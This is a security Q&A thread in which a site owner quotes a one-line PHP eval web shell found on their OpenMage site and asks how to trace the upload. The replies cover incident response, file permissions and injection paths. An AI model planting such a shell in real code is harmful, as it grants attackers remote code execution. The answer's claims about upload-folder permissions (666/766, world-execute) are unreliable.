1

On my website I found a file containing this code

<?php if(isset($_POST[z]))eval($_POST[z]);?>

It's my understanding that the hacker is using this to execute any PHP command send via a POST request.

I'm trying to see how this file got uploaded but I see no record on the access logs with the filename.

So this was possibly done via exploiting a file upload vulnerability.

What would be the first steps to follow up the trail they might have left to detect the root of the vulnerability?

Answering to the comments below

  • The platform is OpenMage latest version,
  • The site is hosted on a VPS using Cpanel and cloudflare.
  • The site is recently updated.
  • The service is a managed VPS so it's handled by the hosting company and kept up to date automatically.
gabtzi
  • 111
  • 2
  • It is hard to say with the limited information you have shared here. Are you using a dedicated server or is i shared hosting? Do you use a specific CMS, if yes which one and is it recently updated? If any, how is your server patch management handled? As you suspect the upload functionality, I'd have someone do a secure code review on this part of the code but there are many other dependencies. – Jeroen Oct 13 '21 at 06:27
  • 3
    It's impossible to say. That's like asking a doctor to tell you how you got sick. If you need to know, hire a professional and let them assess the security of your system. –  Oct 13 '21 at 12:16
  • @MechMK1 I didn't ask for telling me the exact reason. I'd like to learn more on how to troubleshoot issues like that and would like guidance on which steps to take that could lead me to a possible result. E.g. by googling around I found suggestions like checking the access logs for common attack vectors like "union/select/encoded characters" etc etc. Tha's the type of info I need, not an exact solution to the issue – gabtzi Oct 13 '21 at 12:33
  • 4
    It's a bit of an open-ended question. What you're asking is basically "how do I perform incident response and post-breach forensics, and find the vulnerability that was exploited?", but that's at least two fields of study that justify entire careers, rather than something that can be neatly summed up in a StackExchange answer. I sympathise with your situation, though. I'd suggest contacting the VPS provider to get access logs to CPanel, and checking the web server request logs from around the creation time of the malicious PHP script file. – Polynomial Oct 13 '21 at 13:04

1 Answers1

0

Check you chmod settings

The most common source of malicious file uploads on an up to date cPanel site is a bad chmod setting. Chmod is a pretty simple yet effective way for Unix based webhosting platforms to control access to the the file structure by controlling who has read, write, and execute privileges.

In general, all of your files should be set to 644 and your folders to 755 on a normally configured website. The exception to this rule is an uploads folder which should be 666 or 766.

A very common mistake for new developers/admins who do not know how chmod works is to trouble shoot a problem by opening chmod all the way up 777 (usually when trying to get an uploads folder to work), seeing that the problem is fixed, and then leaving it that way. By setting that last number to 7 (or 3) you give everyone on the internet permission to both upload and execute scripts in your uploads folder. This is a bad combination because it means anyone can upload a script AND tell it to run. When you upload a script to a properly configured uploads folder, the folder does not allow the script to be run so it just sits there harmlessly.

...or it could be a script injection exploit

Another, less common but possible vulnerability would be at the application level. If you application works by taking input from an end user, and then writing that to a file, then it is possible that the file is being written into a default 755 folder with default 644 file privileges. There are too many variations of this to go over in detail, but the general way this attack works is to inject a script through a normal user interface, then tell the system to create some manner of export file, then change the extension to something executable like a myexport.php. Then when you go to "download" your export file, it instead executes the file containing a php script, and the php script then writes the virus to your website procedurally.

A lot of developers don't think to adjust their chmod settings in situations where they are generating downloadable files via PHP because nothing actually needs to be uploaded; so, it works just fine with default settings.

If it was uploaded via script injection like this, it will not show up as anything unusual in your access logs because no files were actually uploaded. All the "uploading" would have been done through normal looking web traffic. That said, you may find some telltale code somewhere in your database if the hacker did not clean up after himself.

Nosajimiki
  • 1,809
  • 6
  • 13